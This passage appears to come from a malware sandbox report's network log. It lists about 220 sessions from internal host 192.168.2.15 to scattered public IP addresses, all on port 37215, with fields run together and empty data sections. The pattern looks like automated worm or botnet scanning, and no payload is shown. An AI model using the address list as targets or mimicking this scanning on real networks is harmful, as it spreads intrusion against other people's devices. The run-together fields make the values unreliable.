                                              27344192.168.2.155813441.213.230.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27345192.168.2.1550762197.91.20.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27346192.168.2.1549722102.41.76.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27347192.168.2.1546994156.9.82.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27348192.168.2.1560378186.113.246.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27349192.168.2.1552168222.182.59.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27350192.168.2.1535934186.154.92.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27351192.168.2.1539318122.235.128.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27352192.168.2.1557940122.10.227.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27353192.168.2.1543230157.242.65.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27354192.168.2.1535184132.163.193.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27355192.168.2.1549810102.208.212.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27356192.168.2.155843631.166.195.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27357192.168.2.1546698181.219.179.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27358192.168.2.1534050222.234.77.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27359192.168.2.1551594138.183.224.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27360192.168.2.1535440222.48.232.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27361192.168.2.154639831.60.5.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27362192.168.2.1553208186.94.171.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27363192.168.2.1547174222.44.9.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27364192.168.2.1552128222.110.79.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27365192.168.2.1541426197.188.53.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27366192.168.2.1557356157.219.255.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27367192.168.2.154034441.144.21.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27368192.168.2.1544188186.238.180.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27369192.168.2.1537996122.17.13.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27370192.168.2.154111837.94.183.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27371192.168.2.153363894.200.0.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27372192.168.2.1543778122.162.55.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27373192.168.2.1534330122.141.190.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27374192.168.2.1540788121.93.241.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27375192.168.2.154695037.18.237.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27376192.168.2.1556842186.223.250.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27377192.168.2.1542320222.44.25.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27378192.168.2.1558530197.26.6.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27379192.168.2.1537208181.195.161.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27380192.168.2.1548558121.102.246.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27381192.168.2.1535994190.82.47.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27382192.168.2.1550462190.130.136.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27383192.168.2.1534038197.6.48.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27384192.168.2.155079437.245.220.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27385192.168.2.1556716121.66.47.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27386192.168.2.1541198190.214.76.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27387192.168.2.1541854222.154.44.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27388192.168.2.155321694.131.184.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27389192.168.2.1540902122.15.122.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27390192.168.2.155044094.85.70.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27391192.168.2.1552790197.208.199.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27392192.168.2.1536784122.42.13.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27393192.168.2.1558404202.238.187.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27394192.168.2.1540210186.225.160.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27395192.168.2.1554790121.234.110.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27396192.168.2.1535690197.23.40.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27397192.168.2.155924231.231.191.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27398192.168.2.1559484102.125.166.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27399192.168.2.153606494.253.203.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27400192.168.2.1542962156.7.246.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27401192.168.2.1559320157.147.17.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27402192.168.2.1547798102.227.76.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27403192.168.2.154426441.85.77.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27404192.168.2.1547274222.24.230.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27405192.168.2.153728694.44.164.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27406192.168.2.1551376157.53.71.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27407192.168.2.155461623.189.70.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27408192.168.2.1537940156.22.112.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27409192.168.2.1553228122.62.224.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27410192.168.2.154537845.60.206.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27411192.168.2.1537428190.42.211.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27412192.168.2.1555942197.17.94.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27413192.168.2.1541766157.82.46.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27414192.168.2.1539234121.13.56.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27415192.168.2.1546962157.49.200.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27416192.168.2.1545996102.209.200.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27417192.168.2.153296441.222.139.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27418192.168.2.1539904186.163.214.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27419192.168.2.1560130157.197.48.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27420192.168.2.1558152197.133.170.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27421192.168.2.155548441.216.3.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27422192.168.2.1559040186.241.141.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27423192.168.2.154517237.6.188.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27424192.168.2.1557544122.158.241.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27425192.168.2.155612245.127.76.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27426192.168.2.1553276222.211.1.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27427192.168.2.1556194121.113.191.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27428192.168.2.1539892102.73.180.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27429192.168.2.1538434222.168.206.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27430192.168.2.154536245.218.172.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27431192.168.2.155138231.240.215.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27432192.168.2.1553168186.30.147.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27433192.168.2.1552700121.149.186.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27434192.168.2.154041694.199.177.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27435192.168.2.1535876102.127.230.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27436192.168.2.1543140121.80.64.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27437192.168.2.1552154122.143.84.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27438192.168.2.154256045.190.33.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27439192.168.2.1544160122.38.253.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27440192.168.2.155535831.180.14.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27441192.168.2.155784694.46.250.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27442192.168.2.1538874222.92.88.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27443192.168.2.1546136222.179.237.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27444192.168.2.154250437.144.215.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27445192.168.2.1539316197.248.41.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27446192.168.2.1547788190.105.33.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27447192.168.2.155955053.230.63.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27448192.168.2.1550598157.245.86.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27449192.168.2.155168231.113.94.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27450192.168.2.154619237.181.60.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27451192.168.2.154931637.169.60.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27452192.168.2.1546368138.122.38.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27453192.168.2.1538466138.248.19.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27454192.168.2.155520041.233.46.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27455192.168.2.155716431.57.19.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27456192.168.2.155853094.210.1.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27457192.168.2.154341445.150.82.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27458192.168.2.154228631.6.70.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27459192.168.2.1557468186.103.107.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27460192.168.2.1538640156.76.67.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27461192.168.2.153288637.188.159.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27462192.168.2.1560186186.0.147.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27463192.168.2.154267041.108.180.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27464192.168.2.155850441.152.167.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27465192.168.2.154419245.250.228.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27466192.168.2.1540098138.152.222.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27467192.168.2.153469231.59.207.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27468192.168.2.155778645.71.71.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27469192.168.2.1556970138.18.138.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27470192.168.2.154196641.247.54.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27471192.168.2.1552438122.43.14.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27472192.168.2.1533224197.185.169.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27473192.168.2.1553112138.140.32.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27474192.168.2.1543626186.79.3.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27475192.168.2.1554686186.57.127.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27476192.168.2.155772294.239.199.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27477192.168.2.153338631.244.247.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27478192.168.2.1536920222.165.204.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27479192.168.2.1547108138.172.44.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27480192.168.2.1542028121.225.60.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27481192.168.2.1553090121.160.23.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27482192.168.2.154116031.116.42.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27483192.168.2.1554342156.243.102.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27484192.168.2.153557431.107.208.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27485192.168.2.1541618156.31.55.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27486192.168.2.1554816190.90.110.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27487192.168.2.1556584186.107.65.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27488192.168.2.1533592222.222.251.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27489192.168.2.154367046.15.101.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27490192.168.2.1540336102.90.55.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27491192.168.2.1556640190.80.71.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27492192.168.2.1558302190.7.88.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27493192.168.2.1560892102.104.166.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27494192.168.2.1542098181.76.104.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27495192.168.2.1543882222.25.51.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27496192.168.2.156064837.49.47.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27497192.168.2.1535750122.47.26.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27498192.168.2.1548640138.128.247.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27499192.168.2.1548670190.5.142.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27500192.168.2.1560860197.130.111.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27501192.168.2.1557864156.207.181.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27502192.168.2.1555306222.110.126.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27503192.168.2.1555408186.142.97.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27504192.168.2.1553298102.149.102.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27505192.168.2.155862694.226.0.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27506192.168.2.1545434186.67.154.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27507192.168.2.153599031.133.22.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27508192.168.2.1558910181.163.187.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27509192.168.2.1539660197.162.62.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27510192.168.2.154341431.47.5.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27511192.168.2.1548908151.212.171.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27512192.168.2.1540522222.109.249.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27513192.168.2.1535668138.117.2.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27514192.168.2.1553560197.111.47.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27515192.168.2.1542490156.33.136.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27516192.168.2.153384641.117.224.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27517192.168.2.1560360186.34.192.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27518192.168.2.1554052181.16.17.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27519192.168.2.1547298181.38.233.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27520192.168.2.154717094.121.133.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27521192.168.2.1537670157.11.135.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27522192.168.2.1543582102.238.2.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27523192.168.2.1553134122.38.249.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27524192.168.2.1534442181.117.160.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27525192.168.2.1550618121.23.58.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27526192.168.2.155801894.171.34.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27527192.168.2.1546888186.150.112.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27528192.168.2.1543010138.37.110.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27529192.168.2.1542522186.38.164.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27530192.168.2.1552636197.220.100.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27531192.168.2.1540956138.149.134.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27532192.168.2.154416437.243.173.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27533192.168.2.1556804138.160.193.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27534192.168.2.1554462222.12.244.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27535192.168.2.1559910190.87.223.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27536192.168.2.1540562122.141.35.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27537192.168.2.153553889.107.43.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27538192.168.2.1536738102.50.144.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27539192.168.2.1537962181.151.98.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27540192.168.2.1559936121.65.222.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27541192.168.2.1551740156.2.3.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27542192.168.2.1551448181.111.155.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27543192.168.2.1553108157.224.81.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27544192.168.2.1537834156.103.68.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27545192.168.2.1543340181.239.92.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27546192.168.2.1553170197.166.193.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27547192.168.2.1537244156.136.6.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27548192.168.2.155116437.151.214.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27549192.168.2.1539152190.3.36.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27550192.168.2.155971045.201.200.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27551192.168.2.155279441.147.100.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27552192.168.2.1536754121.243.79.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27553192.168.2.1547760190.191.5.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27554192.168.2.1535778190.104.42.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27555192.168.2.1534490122.81.56.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27556192.168.2.1544664122.41.30.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27557192.168.2.155111641.159.47.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27558192.168.2.153758445.30.134.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27559192.168.2.155916631.61.233.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27560192.168.2.155829437.238.107.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27561192.168.2.1548460197.84.252.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27562192.168.2.154901437.232.76.14937215
